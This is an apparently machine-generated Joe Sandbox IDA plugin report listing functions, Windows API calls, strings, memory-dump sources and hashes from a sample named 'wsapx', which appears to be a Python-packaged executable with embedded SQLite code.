Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 5578c14fe94a244900e9a575e4f77a257a8de495ed559fdf9b362ebbbffb2fa7
Instruction ID: f0ddfb54fb9ec7ee14178d4a41ba3103b588aca2adbbb5e5cdd1bef71c2110f3
Opcode Fuzzy Hash: 5578c14fe94a244900e9a575e4f77a257a8de495ed559fdf9b362ebbbffb2fa7
Instruction Fuzzy Hash: 9951BB62A0864287EA60BF56B4403BAA691ABC5FB4FC44135ED4E47BD5EF3CE5078720

Function 00007FF7C71B36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36E1
GetLastError.KERNEL32(?,00007FF7C71B3804), ref: 00007FF7C71B36EB

Part of subcall function 00007FF7C71B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2C9E
Part of subcall function 00007FF7C71B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C71B3706,?,00007FF7C71B3804), ref: 00007FF7C71B2D63
Part of subcall function 00007FF7C71B2C50: MessageBoxW.USER32 ref: 00007FF7C71B2D99

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF7C71B3739
Failed to convert executable path to UTF-8., xrefs: 00007FF7C71B3790
\\?\, xrefs: 00007FF7C71B375A
Failed to obtain executable path., xrefs: 00007FF7C71B36F3
GetModuleFileNameW, xrefs: 00007FF7C71B36FA

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: d7c625f00dc0556c782e8169b8c780d09ad15c6b6bcd1706939ef0799a3c3d24
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 292186A1B1854293FA21BF24F8453BAA250BFD9B74FC04131D95D825D5EE2CE507C720

Function 00007FF7C71CBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CBEF9

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction ID: 41f3a82bdc70f6a546d4a16df185e655519058753c3f07397cff2973656d6180
Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction Fuzzy Hash: 27C1C522A0C68643E771AF95A4402BDBB64EBC1FA0FD54131EA4E43795CE7CEA578720

Function 00007FF7C71B6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF7C71B6446
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7C71B63B7
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF7C71B63F7
Failed to load Python DLL '%ls'., xrefs: 00007FF7C71B6497
ucrtbase.dll, xrefs: 00007FF7C71B63CD
LoadLibrary, xrefs: 00007FF7C71B649E

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction ID: d131e0bf37c044a7974ff9731e90d6bf2c0c4d3d92f0c100cc1a6b660e626357
Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction Fuzzy Hash: 08418171A18A8692EA11EF21F4552E9A321FBD4BA0FC04132DE5D43695EF3CE607C760

Function 00007FFD9474EF40 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 412
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9474F17A

Part of subcall function 00007FFD9474E980: 00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9474E9EB
Part of subcall function 00007FFD9474E980: 00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9474EA73

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFD9474F256
psow, xrefs: 00007FFD9474F4F1
winOpen, xrefs: 00007FFD9474F3ED
exclusive, xrefs: 00007FFD9474F10A

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619$CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 400822396-3829269058
Opcode ID: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
Instruction ID: 790a0a64dae7022f9530f0086799ea6b66cf16918798a3825782c9654e32542f
Opcode Fuzzy Hash: 3bf394784fb49c126f92dae6b034876b463d8c9389f1d231e195629b2493f58d
Instruction Fuzzy Hash: 9C029F31B09A46C6FA788FE1A8E027977A5FF86B54F048635DE4E426A2DF3CE445C740

Function 00007FFD947590D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 00007FFD94759112, 00007FFD9475926E
database corruption, xrefs: 00007FFD9475910B, 00007FFD94759267
831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FFD947590F2, 00007FFD9475924E

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 0-3764764234
Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
Instruction ID: 61b38557c12ebad3576b2d46a8871dac98944910efc112711b8e5621a6aa2ade
Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
Instruction Fuzzy Hash: 4D714261B0864AC1FAB49BD5E5E437977A1FB86B84F54C035CA4D4B6A6EF3CE442C380

Function 00007FFD9474C960 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FFD9474CA20
00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9474CAE4

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFD9474CAB9
winRead, xrefs: 00007FFD9474CA78

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 3382942480-1843600136
Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
Instruction ID: 8921c7a0011181456955f8ed91acf752b52913a02477dbaf42a1f7a861cb5f59
Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
Instruction Fuzzy Hash: 85411732B08A4A8AE230DF95E4E04B87796FB46780F55C136EA4D43796DF3CE441C780

Function 00007FF7C71C5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C56C5
CreateFileW.KERNEL32 ref: 00007FF7C71C5704
CloseHandle.KERNEL32 ref: 00007FF7C71C5739

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 3fa3712730203a21713272f923b36b88b47f3eb768463d7f2c27089bf2514277
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: E541C822D1878183E310AF61A551379B760FBD4BB4F908334EA5C03AD1DF7CA5E28760

Function 00007FF7C71BCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71BCE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7C71BCE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7C71BCCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF7C71BCD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7C71BCD91

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: b51fe4a4f4d6e6491221dbb5985eeacbca90a5ed64967321097aa08276f2f87e
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: EF314BA5E0824743FA64BF64B4623B99A919FC5FA4FC44434DD4E4B2D3DE2CE50786B0

Function 00007FF7C71C01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C01F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C02E7

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 38bd95e9f4edfaad8ff504e530bdb76222f489bed8d80ab98bd67998b975b0b8
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: D851D421B092414FE624AEA6A90067EE691BBC4FB4F945734DE6D477C5CE3CD4028620

Function 00007FF7C71CC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF7C71CC33D), ref: 00007FF7C71CC1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF7C71CC33D), ref: 00007FF7C71CC1FA

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction ID: 45cd257ebe968dedf8a9017d63e518e87f626e9994ae5da0e6065c9b46ba4dc3
Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
Instruction Fuzzy Hash: 7611C461A18A4182DA20AF6AB844169A361BB85FF4F944335EE7D4B7D9CE7CD4528700

Function 00007FF7C71CA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction ID: bb80073ab4e34203d482b92d8b1f0b610e16cf64405409afa22fc5c342af9738
Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
Instruction Fuzzy Hash: D1E04F10E0820253FF167FF2788613896A06FD4F60F854034C91D822A1DE2C69878620

Function 00007FF7C71CABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC36
GetLastError.KERNEL32(?,?,?,00007FF7C71CAA45,?,?,00000000,00007FF7C71CAAFA), ref: 00007FF7C71CAC40

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction ID: fcb1af7905ca4188874b991a65e92d67468ddf644b753bcdf3443fa653a7e908
Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
Instruction Fuzzy Hash: EE216211B2C64243EAA57FA5B49527D92D2AFC4FF0F884235DA2E477C1DE6CA4878324

Function 00007FF7C71CBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CBF44

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 205d2de5721195348593361f256ffe3bf771015d63912b837573ae568e498404
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: 3741D732A0820187FA34AF99B541279F3A4EB95FA0F940131DB8E87791CF2DE503CB61

Function 00007FF7C71B7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF7C71B802A

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: e030e723ccfde11af85d0dda47479fa887e00b1a31505a58a3447353ba43a7bb
Instruction ID: fac5da0a37711a33efb0f7be2c34fcc64e4431d87ee4fa977ff3b5c943acd697
Opcode Fuzzy Hash: e030e723ccfde11af85d0dda47479fa887e00b1a31505a58a3447353ba43a7bb
Instruction Fuzzy Hash: CB217E61B1865287EB14BE6379043BAD691BF85FE8FC85430EE4D0B786CE7DE0428660

Function 00007FF7C71CB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71CBA32

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: fdfc1001f932569fa1f7ad15dc0e1ab766aca97bd891d72e38dd49d6acebaed0
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: 0F318F21A1864287E7627FD5A84137CAA50ABC0FB4FC50135EA6D833D2CE7CE5438730

Function 00007FF7C71C6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C5F69

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 91115e2fd1bbbc9c0d303a93905b340650122a0185ad83e0113169f1e32c1d17
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: 05116322A1C64183EA65BF91B40117EEAA8BFC5FA4FE44031EB4C57B96DF7DD4428720

Function 00007FF7C71D63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D63E7

Memory Dump Source

